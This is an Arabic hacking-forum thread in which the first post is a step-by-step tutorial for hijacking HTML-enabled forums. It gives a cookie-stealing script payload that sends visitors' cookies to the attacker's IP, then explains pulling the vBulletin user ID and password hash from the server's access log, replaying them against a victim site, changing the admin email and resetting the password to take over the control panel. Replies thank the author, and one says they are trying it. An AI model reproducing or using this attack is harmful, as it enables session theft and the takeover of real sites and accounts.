لوووووووول طريقة اختراق المنتيدات التي تدعم .html

لوووووووول طريقة اختراق المنتيدات التي تدعم .html


النتائج 1 إلى 4 من 4

الموضوع: لوووووووول طريقة اختراق المنتيدات التي تدعم .html

  1. #1

    Newnews لوووووووول طريقة اختراق المنتيدات التي تدعم .html

    السلام عليكم متل ما وعدتكم انو بعوظ الغايب اليوم طريقة حلوة عل شان الاختراق المنتديات التي تدعم .html

    المهم شو بدكم بكترت العي ههههههه

    نبدأ.

    طريقة اختراق المنتديات التي تدعم ال
    html
    الثغرة :
    ---------
    تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
    بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ
    HTML ..

    قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ
    HTML
    ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
    ******************.write('<img
    src="http://my_ip_address/'+********.*****e+'">';</script>

    مع ملاحظة تغير الـ
    IP Adress
    الى رقم الـ
    IP
    الخاص بك .

    وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
    من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
    الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل
    IIS
    او
    Apache
    او غيرها ) .

    وبعد ان تتم العملية بنجاح قم بفتح ملف الـ
    Log
    الخاص بالسيرفر الذي يحتويه جهازك ..
    مثال لو كان السيرفر اباتشي .. فتاح المجلد
    Apche
    واختر
    logs
    واختر
    Acces Log .
    ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

    ابحث عن الكود الخاص بالباسورد .. مثال :
    GET/ bbuserid=86;%20bbpassword=dd61
    69d68822a116cd97e1fb
    ddf90622;%20sessionhash=a
    4719cd620534914930b86839c4bb5f
    8;%20bbthreadview[54
    20]=1012444064;%20bblastvi
    sit=1011983161

    فكر قليلا الان .. اين الباسورد ؟؟
    الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
    قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
    في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
    لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
    وثم قم بتسجيل الخروج .. ثم اذهب الى اداة
    Forgot Password
    .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

    اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

    ههههههههههه ردووووووووووووووور

    اخوكم كوبرا

  2. #2

    افتراضي رد: لوووووووول طريقة اختراق المنتيدات التي تدعم .html

    تسلم يالغالي

    - - - تم التحديث - - -

    بس الطريقه هذي لمنتديات الفيبي

  3. #3

    افتراضي رد: لوووووووول طريقة اختراق المنتيدات التي تدعم .html

    الله يجزيكم خير في الدارين

  4. #4

    افتراضي رد: لوووووووول طريقة اختراق المنتيدات التي تدعم .html

    يسلمو جاري التجربه

المواضيع المتشابهه

  1. اختراق المنتديات عن طريق ثغرة Html
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق المنتديات
    مشاركات: 11
    آخر مشاركة: 04-08-2011, 10:46 PM
  2. اختراق الايميلات عن طريق html
    بواسطة xx the hell xx في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 5
    آخر مشاركة: 06-06-2010, 08:15 PM
  3. طريقة تركيب الكيجن Keygen للنسخ التي تطليه
    بواسطة ASDELY-ScOrPiOn في المنتدى تطوير المواقع والمنتديات
    مشاركات: 5
    آخر مشاركة: 03-19-2010, 07:49 AM
  4. طريقة صنع برامج الحمايات المحمولة التي نحتاجها في التشفير
    بواسطة She!! Access في المنتدى قسم اختراق الأجهزة
    مشاركات: 5
    آخر مشاركة: 02-07-2010, 04:46 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •